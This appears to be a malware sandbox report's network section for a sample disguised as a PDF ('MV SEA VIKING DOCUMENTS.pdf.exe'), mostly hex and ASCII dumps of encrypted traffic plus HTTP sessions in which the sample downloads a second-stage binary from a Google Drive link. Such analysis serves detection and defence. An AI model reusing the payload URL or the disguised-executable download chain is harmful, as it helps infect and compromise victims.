                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC158INData Raw: 25 ac 65 37 cd 61 26 a8 5c fa 3b eb 1f 2f 94 52 9b 23 11 90 94 c5 59 d2 4c 4d ea e8 77 76 56 27 07 2f 90 d0 04 4d b9 12 b3 a2 f2 fe 83 d0 86 4a 34 42 70 45 c1 52 e0 30 d4 19 06 ef ef 3b 21 36 ec 98 0d 63 4d dd 5a e7 01 a7 40 df 86 d6 5c 46 78 8a 87 97 e1 36 c9 5c 64 65 f3 b7 9a 00 ab 7b 55 51 88 47 1b c7 59 d9 f3 01 ab ac 35 1e a9 4c 71 38 04 39 d6 d8 8a 21 3a 15 a8 6a ed 24 ea 8d 15 b1 a4 63 07 a9 c6 8e 9c ec bc 87 3b 7b b7 90 3f f7 7e cf 64 5f 31 85 41 eb 8f 9d 0f a8 1b d1 35 f7 a8 44 24 9e 97 15 39 99 6f 2f 2b 60 96 97 f9 01 bf 5c 91 8e 26 40 87 67 af 51 14 f4 9b 28 59 7f e3 b0 82 a5 45 41 1b cb 85 17 61 62 44 91 2b 8a 9b f2 3b a5 ca 89 c1 d1 39 4e 70 c4 dd 97 ed b0 c2 8e db 0c 2f a8 42 25 5e c3 d6 57 1f c7 45 ab 16 a8 4a fb 83 bd 42 7c a5 d5 47 36 ad
                                                                                                                                                                                                                              Data Ascii: %e7a&\;/R#YLMwvV'/MJ4BpER0;!6cMZ@\Fx6\de{UQGY5Lq89!:j$c;{?~d_1A5D$9o/+`\&@gQ(YEAabD+;9Np/B%^WEJB|G6
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC160INData Raw: fd 34 0c dc 6c 0a c1 0c 0c 82 62 b2 c1 7c 35 0f 07 f7 86 53 95 ad 41 ce f2 c9 6d c1 84 74 68 23 f4 fd 85 82 ce 6b 0e 47 06 ca db 82 5b dd 55 0b 81 2e 4a a0 41 7a 1a 99 ca ee 0e 70 4a d0 67 1e 0c b9 4f c6 d7 ab 90 86 ab 28 db c3 9a 08 26 06 51 a2 d7 56 80 20 b5 94 cd 93 ec da 15 30 8b fa 6e 70 a8 11 92 10 a1 26 a7 f4 e7 05 7a 36 65 6b d4 62 8c 6c 35 6f e3 9e 24 62 84 36 75 a5 6b 69 21 23 72 2a 41 e8 ab 60 9c f3 dc b5 af be 71 32 91 79 a3 6c 1f 95 9a cb e0 39 1b 3f a3 51 c3 73 8a 73 ed f7 7a 55 89 90 12 d3 b3 fe 59 77 5e 1c 50 d7 1b d9 b8 38 67 52 13 27 a3 38 ce 70 e4 20 e4 cc 7d cc 0c ea ca 08 45 f8 ed a3 5e c5 fb 87 c6 b7 5a 44 68 8b e8 cf ff cf 8b d4 a5 d0 25 8f 6c e1 b5 51 ac c5 1f 62 ed 77 b3 65 1e ed e8 d1 44 85 86 53 4f dd b0 a3 7c 4f ee d2 bd dc ab
                                                                                                                                                                                                                              Data Ascii: 4lb|5SAmth#kG[U.JAzpJgO(&QV 0np&z6ekbl5o$b6uki!#r*A`q2yl9?QsszUYw^P8gR'8p }E^ZDh%lQbweDSO|O
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC161INData Raw: 27 cb 1d eb 9b ca 13 a2 e9 b1 87 e4 10 e1 49 a2 a7 80 69 99 50 29 c4 0b 2c a4 dc 3b 90 16 f5 45 f8 c4 d1 48 b8 a3 38 88 f3 f9 13 85 b0 3c 93 82 65 35 b1 75 c7 2e b7 41 70 07 4d 53 1f 83 4a fa 13 18 c6 b8 86 01 2b 11 64 54 95 11 1e 06 c5 87 b0 47 f9 0f 3e 21 39 99 c2 4d b3 1a 32 31 56 78 40 03 51 5f 1a 7f f9 aa 61 fb 81 d2 eb 7b 9b ac be ab a2 19 98 87 95 c1 d6 b2 67 74 bf c4 d0 16 ea fe 6f 3e ff 12 db 1f 0e 27 20 b2 c8 0b 0b 3d 47 dd 7c 42 f0 4c 01 24 dd 08 46 8c 81 33 3d 4e 66 58 8a 26 dd 39 4d 00
                                                                                                                                                                                                                              Data Ascii: 'IiP),;EH8<e5u.ApMSJ+dTG>!9M21Vx@Q_a{gto>' =G|BL$F3=NfX&9M
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC161INData Raw: 92 29 20 01 f3 59 6c 26 3e ef 4c 7e c9 34 1b 6e a8 60 52 33 93 3a 90 18 43 ae aa 19 12 17 6d 17 a9 3e 2b 76 ca 59 7f d8 3e 72 e4 6e 7c 97 f5 12 f2 cb be 44 4f 96 11 f3 14 c4 e8 83 ea 0d a0 11 f4 be 75 08 1a a0 f9 0e ca 1a f6 65 4f 26 08 68 a5 ac 07 9c 79 ee e5 1c 9a 60 1c f1 2b 21 27 9c fa d6 7d a6 b8 ac 44 2d 71 b7 33 71 eb f1 2a 80 ec fd e1 4d 28 8c 14 38 77 73 bb 0d 3c b8 3a 1f 68 7c 9f 2f 3e 34 bc 27 20 b2 e3 76 f3 2e 15 53 25 ec 73 b3 7d ae 05 86 93 b9 26 95 a9 1a c7 69 7f 77 45 fd df 66 a7 04 db 3b 11 3f 08 2d cb 0f 30 51 00 e8 95 c7 00 79 46 a1 c8 7f c7 08 44 93 72 51 bb a7 e1 bc b9 7a 6f 7d b4 f3 e0 e5 29 43 2a e5 e5 e2 43 f3 55 aa e1 b9 f3 c8 d4 a8 a5 45 9b 07 2c 1b 9e cd 0f b5 e0 22 ce 21 c9 93 0c 70 70 75 dc aa ce 93 a2 af 0e 24 2b b6 53 6f 84
                                                                                                                                                                                                                              Data Ascii: ) Yl&>L~4n`R3:Cm>+vY>rn|DOueO&hy`+!'}D-q3q*M(8ws<:h|/>4' v.S%s}&iwEf;?-0QyFDrQzo})C*CUE,"!ppu$+So
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC162INData Raw: 43 42 68 c2 84 73 a5 4c a0 c5 30 7b 19 7c d3 ed c0 4f 49 2d a2 00 25 4b d3 b0 9b ba 49 02 a0 c3 08 c4 c3 73 59 1e 94 60 d0 3b 10 e3 a9 19 cd 1e 4f 2f ea be 5b 27 66 68 b2 8f 52 71 48 eb b7 65 e6 24 a4 bb d4 28 97 bb b9 74 c1 85 c8 f0 27 a5 a2 24 9c be cc 1a f0 26 1f 96 6b 34 50 15 77 27 7d 3a 85 41 54 c8 cb cd 4f b2 ed 73 84 c2 0f 56 f2 21 8b ff d2 01 56 d1 74 fe 06 9c 27 20 cb 8a bf 7b 27 b9 82 10 01 55 c7 93 cb a3 4e 6b 92 29 bd ec a9 a0 cf 44 92 1f 81 0c 6f 02 83 41 02 4a 49 74 5e b7 ab 0b 00 14 c2 5b e7 8e e2 d5 be 7a e6 8d a1 14 a8 d5 f9 82 45 c0 e0 1e 2c 6d 41 05 13 13 f3 1f 5d d1 16 94 dc df 8e 21 ca 8a d0 cb fa 27 73 9c da 75 37 20 96 91 74 8d a8 f2 09 35 bb de 9f dc aa 2d b5 96 98 0a 2c 67 46 2c 8f 65 93 cf 67 54 d2 fb e9 6d 3c a9 b0 1d fb b9 8e
                                                                                                                                                                                                                              Data Ascii: CBhsL0{|OI-%KIsY`;O/['fhRqHe$(t'$&k4Pw'}:ATOsV!Vt' {'UNk)DoAJIt^[zE,mA]!'su7 t5-,gF,egTm<
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC164INData Raw: c0 ee 47 5a fe e8 27 15 7e 75 9c 27 cf ac 6d 90 6e ea de a6 30 3e 30 0a 24 dc 90 95 ec 05 43 46 ab d0 5b a5 d3 c1 69 d4 60 88 86 eb 5c 72 56 2d 37 5e 4c 79 7b 58 c7 f2 06 24 48 80 10 d5 99 48 01 f2 c5 45 e2 b1 e5 80 90 88 b7 25 83 9f 0d 22 72 f0 48 a6 61 42 fb 79 b5 01 a1 2f 48 e2 1b e8 41 4b fe ff c7 0a eb 5b 8c c4 4a 98 8f 0d ce 3d 7c 59 c4 79 b0 62 4e 25 ac d5 1f 3d 5a fb 21 8c 79 16 b7 28 8b 84 7c 28 67 c3 07 fb 43 e9 a6 47 b7 85 cd b9 89 7f 82 83 04 fd 96 d8 75 33 f8 c5 2b 27 06 90 ac dc 56 b5 f4 56 58 7d 22 45 59 4f f2 7f 95 e1 5b 3e fe 22 b6 3f 2b 09 c0 be 8e b8 20 50 33 18 37 44 c2 d4 b3 b6 af 09 6d 8c f7 72 de 87 7b e6 9a 7b 95 05 25 6c 8d 06 c5 49 b3 95 ae 61 65 3f a0 4d d1 80 d1 4c ae e8 f0 d5 a3 f8 0e 4e e8 8d f1 df 40 e9 1c 7a 21 d9 55 a0 70
                                                                                                                                                                                                                              Data Ascii: GZ'~u'mn0>0$CF[i`\rV-7^Ly{X$HHE%"rHaBy/HAK[J=|YybN%=Z!y(|(gCGu3+'VVX}"EYO[>"?+ P37Dmr{{%lIae?MLN@z!Up
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC165INData Raw: fa f4 89 b2 85 5a b5 ed 0f eb 1d cd 6a e0 fb 44 73 60 d1 f0 8a 13 ae 92 22 17 66 d8 d0 77 c1 8b 09 a6 42 f5 e5 d6 d7 f6 88 21 1e 39 63 66 c7 d0 e4 08 1a 15 ac 9c dd 6e 38 94 94 f4 2b 1e 2b c1 83 9f d4 ae e1 13 cf 55 19 b5 1e b1 8b 60 37 7f 55 1b 50 d8 e1 34 c7 e8 43 b5 e0 2d fd f3 56 78 19 0a 82 d4 c0 00 3f d8 d8 3c 48 96 01 9a c2 9b 0b c1 67 63 ce 98 74 5a 70 83 1d 5c 66 dd e7 dc 9f 02 0f 6f 64 02 70 ae 33 f0 f3 ff 35 0a cd 09 c4 c4 06 6e d2 29 22 bf 40 d5 f3 3c 0f e6 75 21 b8 f8 7d 54 a5 42 f0 a9 db 93 ec 7e e5 7d 57 53 e7 35 bd e4 8b f7 1f 55 73 1c 32 ce cd ec 31 b4 46 6a d6 d8 f0 dc 20 d1 94 bb a4 de 2d c8 1f e5 91 0c f2 d5 53 97 00 0a f3 6e e5 32 f6 b4 9d d9 42 3a 18 70 fc eb 7c 94 f7 c7 97 dd 4a c5 8e ae 92 d9 d7 31 07 59 a3 20 99 b6 22 24 bb 63 f8
                                                                                                                                                                                                                              Data Ascii: ZjDs`"fwB!9cfn8++U`7UP4C-Vx?<HgctZp\fodp35n)"@<u!}TB~}WS5Us21Fj -Sn2B:p|J1Y "$c
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC166INData Raw: ea d5 3e be 93 5a 86 00 ef 6d 72 85 12 1a 45 31 89 71 c7 db ed 06 d2 c7 c5 a8 40 53 da 8e 62 27 95 25 dd 1e e7 1d 53 19 ee be 75 f8 12 72 8c d7 f9 cd dc eb ab 7e 4a 29 05 c1 d2 40 e0 75 99 2c 11 74 56 96 2c 53 93 2d 04 5d d2 ae 98 93 a9 aa 1e e2 2e ac c8 02 d7 bd 57 f3 ef 78 f5 2c ac 19 63 6c 1e 41 d1 04 ca ee 4d 41 5e 86 51 27 15 07 1a 4e b1 ab a1 89 47 cc 80 10 30 bf cd 62 f5 e3 8c 00 fa 36 06 24 bc 14 f9 41 2e 1f a0 ad fc 8c af 5f 2f 74 73 aa a3 3c b7 27 ce 1c 6d cd 35 8f 37 12 43 e2 92 75 d1 42 1a 2c 27 e8 77 40 1e 5e f2 16 56 73 84 6f 7e 96 51 d0 d3 f0 bb c8 98 4a 18 c3 13 7b 18 31 3c 1a b6 2a e4 af f9 0e 49 36 56 29 9e 5a 22 d1 66 51 c5 c2 67 36 53 36 d2 07 41 99 7b fc a2 96 04 8d 88 20 63 0d c7 53 56 da d5 98 0a 35 36 f2 ee 87 66 6c f0 26 7f ab d7
                                                                                                                                                                                                                              Data Ascii: >ZmrE1q@Sb'%Sur~J)@u,tV,S-].Wx,clAMA^Q'NG0b6$A._/ts<'m57CuB,'w@^Vso~QJ{1<*I6V)Z"fQg6S6A{ cSV56fl&
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC167INData Raw: 74 43 a8 e5 ae e0 54 83 63 9f a5 3a 8b 48 4a e8 ee d2 a5 22 cc 53 7b ba 42 cc dd 8e dc 4e b4 f4 cd 07 a9 05 28 3d 86 e7 b4 b9 f1 5f 53 eb 5c d4 db 58 23 65 22 0f 49 5d 6c 4e 4e 5f 86 01 5d 3e 0e 48 87 0b 28 ac e5 08 7d 91 b7 7b c9 87 cb ee eb e9 ba 46 b6 5d 59 94 14 6b 2d 63 54 33 6b 0f f6 66 ff 71 af aa 5c ba 3d da d1 fb 80 95 dc a6 03 47 90 79 7e 7a 31 f4 f4 51 c4 67 fb db 61 0a 0f 59 4d c2 6a aa e8 48 a4 c3 3f b3 8d a7 a5 b8 c2 05 87 5a 4b 8f 33 f9 ee bc 29 36 fd 20 59 e7 2e 21 01 66 ba c3 06 73 58 48 d7 dd 47 dd 31 a3 e3 82 59 fc e9 e3 43 b8 c1 74 fc bd 23 ef 4c e9 90 49 c6 dc 9a fa c7 1a 3e d4 95 72 40 19 24 1f 67 76 33 7e 3b 51 2d 13 58 92 1e 6c 3f 32 5b fd 43 8b c4 c1 7e 02 7d 33 63 1b 06 2a ba 4f fe f8 a8 55 c6 e7 b2 29 be 11 c7 ed ad d6 a6 5e cc
                                                                                                                                                                                                                              Data Ascii: tCTc:HJ"S{BN(=_S\X#e"I]lNN_]>H(}{F]Yk-cT3kfq\=Gy~z1QgaYMjH?ZK3)6 Y.!fsXHG1YCt#LI>r@$gv3~;Q-Xl?2[C~}3c*OU)^


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              2192.168.11.2049807142.250.185.174443C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              2022-02-21 15:54:14 UTC168OUTGET /uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED HTTP/1.1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Host: drive.google.com
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              2022-02-21 15:54:14 UTC169INHTTP/1.1 303 See Other
                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:14 GMT
                                                                                                                                                                                                                              Location: https://doc-04-08-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvob9bt0aenrms2uk1g1u44qsq7kk1jh/1645458825000/01502421811266965908/*/1_L7ZipgVNc4_sHw57wljySn0gUbSqwED?e=download
                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                              Content-Security-Policy: script-src 'nonce-FUszQsCpGi0VHz0AeHNv5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                              Server: ESF
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              3192.168.11.2049808142.250.185.161443C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              2022-02-21 15:54:14 UTC170OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvob9bt0aenrms2uk1g1u44qsq7kk1jh/1645458825000/01502421811266965908/*/1_L7ZipgVNc4_sHw57wljySn0gUbSqwED?e=download HTTP/1.1
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Host: doc-04-08-docs.googleusercontent.com
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                              X-GUploader-UploadID: ADPycduQ0XSmW9m21Ys9pwMV0lXMW5TedmBhT9hk4nNxKmK4Um1mHjTDQE6mfd3nTbshi-TfMekvfVz0mUIC7ymUnWk
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                                                                                                                                                                                              Access-Control-Allow-Methods: GET,OPTIONS
                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                              Content-Disposition: attachment;filename="bin_uujKagG139.bin";filename*=UTF-8''bin_uujKagG139.bin
                                                                                                                                                                                                                              Content-Length: 167488
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:15 GMT
                                                                                                                                                                                                                              Expires: Mon, 21 Feb 2022 15:54:15 GMT
                                                                                                                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                                                                                                                              X-Goog-Hash: crc32c=WR929g==
                                                                                                                                                                                                                              Server: UploadServer
                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC174INData Raw: dc e7 5f 44 ab be 13 1d 11 a0 b1 b4 db a3 8f 4b 5c b6 f6 5e f8 85 aa f2 f6 5b 11 a9 75 4f 17 c3 e8 2d a5 29 49 16 50 82 1e fe 62 51 d4 13 8a d3 2e d1 67 37 e9 16 fe f5 1b 48 bf 03 d8 82 28 3d f1 9b 1f e7 46 cb 52 e7 78 a2 60 ac 99 67 ba 62 4a 7a 59 1b 25 2c 0f 58 c2 b9 c6 d5 98 a6 64 95 53 3d 4d e4 8e 0f 6c 6c 63 48 1b c5 9b bb de 8e c5 90 ae af e7 33 3e 28 8c f0 63 eb 18 97 50 aa ce a0 80 b2 47 87 9d e1 9e b9 0e 37 c4 cd 84 ac 36 4e 12 89 cf 1f 1d bd 97 3a b6 e1 17 0a b0 96 f4 40 1a f1 18 93 92 d4 6e e2 fe e1 38 fb 01 e7 ec dc f7 e1 66 aa cf 2e 79 e2 5d 51 ce 33 f2 50 0b 00 f1 3f e4 c2 5d d5 67 fe fd 40 7e e1 9f 01 e9 3f d9 2d cd 37 40 f2 ac e8 38 9c 30 b9 9b 5c 98 2e 0b aa 03 e7 dc bd c6 b7 e2 61 c1 11 53 fa 1d 33 81 ea de 5a 3e 92 84 09 8c 81 4b 2b 69
                                                                                                                                                                                                                              Data Ascii: _DK\^[uO-)IPbQ.g7H(=FRx`gbJzY%,XdS=MllcH3>(cPG76N:@n8f.y]Q3P?]g@~?-7@80\.aS3Z>K+i
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC177INData Raw: 26 61 ed 15 2a e3 50 40 03 64 90 45 1a af ac d7 f3 65 27 2c 73 58 34 58 b1 d4 b7 00 40 e3 9a f2 e1 0b 62 44 a2 d9 15 da ad d8 a5 22 7f 15 79 a9 b6 9a f7 8b c1 6d 86 8d 3f 19 04 bb 04 c4 50 c0 49 cb ac c0 4e 99 2f e8 2e ce 34 55 6a eb 35 5f e2 dd 3b d6 dd b6 5a 4d c5 50 f8 a5 d2 96 87 f0 80 13 5a be 1d 46 dc 3d bf 43 79 19 06 97 35 48 21 76 40 52 9b 8f 13 46 c5 27 80 c0 ec 79 aa 69 be e3 15 e5 b5 20 b8 59 7d e0 4a 0c 61 c4 00 30 9d 08 70 a0 df 2d 1f de 53 a4 b3 f8 80 89 10 d2 05 6a a6 6a d0 c8 82 d6 a1 69 87 0d 53 1d 5b 5c 41 07 f6 31 f1 c5 50 9c d2 c7 62 fa 2f eb bc c2 6e 7b 73 49 62 fa 62 1e ac 30 e7 ca 87 95 bf f6 73 1a 16 9a 4c 5e ac 49 8e 7a d7 1b 68 f7 27 a2 0d 64 72 59 93 2e 80 36 a3 a4 30 42 7d c3 19 0a 45 d6 ed 23 2d 91 2d 72 56 36 66 d5 70 d8 5b
                                                                                                                                                                                                                              Data Ascii: &a*P@dEe',sX4X@bD"ym?PIN/.4Uj5_;ZMPZF=Cy5H!v@RF'yi Y}Ja0p-SjjiS[\A1Pb/n{sIbb0sL^Izh'drY.60B}E#--rV6fp[
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC181INData Raw: ba f7 cc af a0 cc aa 90 f4 08 27 18 cf d1 d6 35 82 3e c9 32 3d e6 a4 b4 ef 32 50 a0 65 35 b0 af 14 89 63 81 03 19 f9 7d 83 ea 92 23 ca 4a c1 7f 17 af 6a e8 9a 50 49 8e 26 bd 60 69 4e e6 1a 87 05 a0 8c 58 67 b5 64 32 bb 2d e4 7f da bb f6 2d 3f 72 d7 86 c9 d3 f8 3e e7 8a 61 4e f2 93 93 ef c5 96 c4 5c 3e 1a 73 3a 6f ca 7a 32 82 f9 ad 44 0d 9c 14 72 d9 1e 36 07 3a f6 41 b8 cc 74 85 16 48 c8 fe d9 11 2f 3b eb 51 5e 21 7a f5 ae 32 09 a8 6c d4 20 c8 19 7c 58 9d 87 6b 3f 15 13 49 89 0e 4c 3c 83 4b 77 2d 6b 7c 54 01 a8 5a 3d db f2 87 38 9b 09 b6 16 ad 89 99 40 5e a7 31 cb 18 b6 04 53 f7 ae 48 60 0e 0c 20 cf 98 47 cf 09 b2 86 62 30 51 fa 43 35 eb 6f 0e 7d 8d fc 65 79 08 6b 21 09 71 80 e6 c5 37 e5 ce 7e 15 b1 7f 1b d8 13 c9 70 7c f8 d5 1a 15 19 b3 37 8c bd 7c 42 93
                                                                                                                                                                                                                              Data Ascii: '5>2=2Pe5c}#JjPI&`iNXgd2--?r>aN\>s:oz2Dr6:AtH/;Q^!z2l |Xk?IL<Kw-k|TZ=8@^1SH` Gb0QC5o}eyk!q7~p|7|B
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC185INData Raw: 95 8a 34 dd ea 08 ca da a0 ae eb 36 f0 5b ef d3 da 70 45 ec 49 82 4c fa cc 27 f4 5e 8f 2b 91 6a 9d 11 e4 ad 6c 59 6e f3 22 6d 50 01 93 41 c8 83 61 c9 e1 f0 03 15 00 56 16 04 f3 89 dc eb 60 29 09 05 92 2f 23 84 4d f2 84 fc 93 11 91 da a1 9a 97 bd 75 b2 c7 f8 59 0b 6e 52 07 19 46 dc 3d ee 2b 79 29 06 97 06 88 49 76 60 52 9b df 44 81 80 f3 99 75 a6 74 6d 2c 66 ce f0 9f 2a e7 fd 85 ee 29 d6 e3 a6 81 e0 90 7d 33 3d 67 9a c9 b1 f4 a6 14 74 bd 68 41 fb 69 39 ad e3 86 53 9b 1b b7 66 2c 77 1a 78 19 25 9b 04 f3 4c 46 27 e3 97 d9 2a 26 0b ee 4c 2c f9 3e 3b 5a 7f 34 a5 7f 92 e0 53 cf e6 c8 83 9d 78 73 87 e4 e9 65 5c 7e ec c9 e8 bd 52 e3 96 08 d8 b9 3b ed f7 a3 6d d1 7f 50 2a 21 ce bc 82 3c f1 05 36 d7 ed a8 dd 12 e9 66 d3 c0 13 d3 2f 86 d0 6e fc 32 4b 11 3e 31 5e 96
                                                                                                                                                                                                                              Data Ascii: 46[pEIL'^+jlYn"mPAaV`)/#MuYnRF=+y)Iv`RDutm,f*)}3=gthAi9Sf,wx%LF'*&L,>;Z4Sxse\~R;mP*!<6f/n2K>1^
                                                                                                                                                                                                                              2022-02-21 15:54:15 UTC186INData Raw: 59 e1 f4 76 48 d6 9d 7a 55 92 3d 90 94 ee fc a7 c3 a0 75 43 73 c7 86 34 da 48 26 f3 24 10 d5 51 d9 dc 49 7a 70 f5 f5 97 78 a7 dd f7 e0 22 92 ec 51 c2 68 9e ab 90 70 b6 c6 f9 9b a3 f7 c0 a7 f2 d5 22 e7 2a 1d e4 05 69 ed 12 2d 0c 8b 24 5a 44 cc c1 d5 95 a5 05 87 ff 26 a0 92 b7 1d a4 fb e4 7d 5e b6 f9 7a 69 20 da 2e f0 54 b4 16 cd 63 06 72 09 0d 38 46 ff 4c b9 73 d9 5c e8 bf 71 12 47 42 59 4b 9b ea 7d 31 d5 11 ca 07 e9 76 17 ea 7f f9 eb 75 16 87 a4 d4 06 3a 33 5b 09 e9 0c a7 67 af b6 37 9d c2 b1 6f 08 5a d4 83 71 be bc 51 17 6a 60 69 b9 d2 1b 26 de f0 00 ee 39 0f 0a 4a 4f 98 1c 2e c5 c6 99 86 de 93 23 ea 35 13 ca 1f c3 dc 8e c5 7b a8 22 7c 33 3e 28 8c 7b 1e 1f 61 68 58 2b 27 40 3a bc 47 b8 e8 94 bb c0 c0 6b 82 32 11 3f 4f bc d1 06 bd 70 7a 44 aa cf 92 43 bd
                                                                                                                                                                                                                              Data Ascii: YvHzU=uCs4H&$QIzpx"Qhp"*i-$ZD&}^zi .Tcr8FLs\qGBYK}1vu:3[g7oZqQj`i&9JO.#5{"|3>({ahX+'@:Gk2?OpzDC
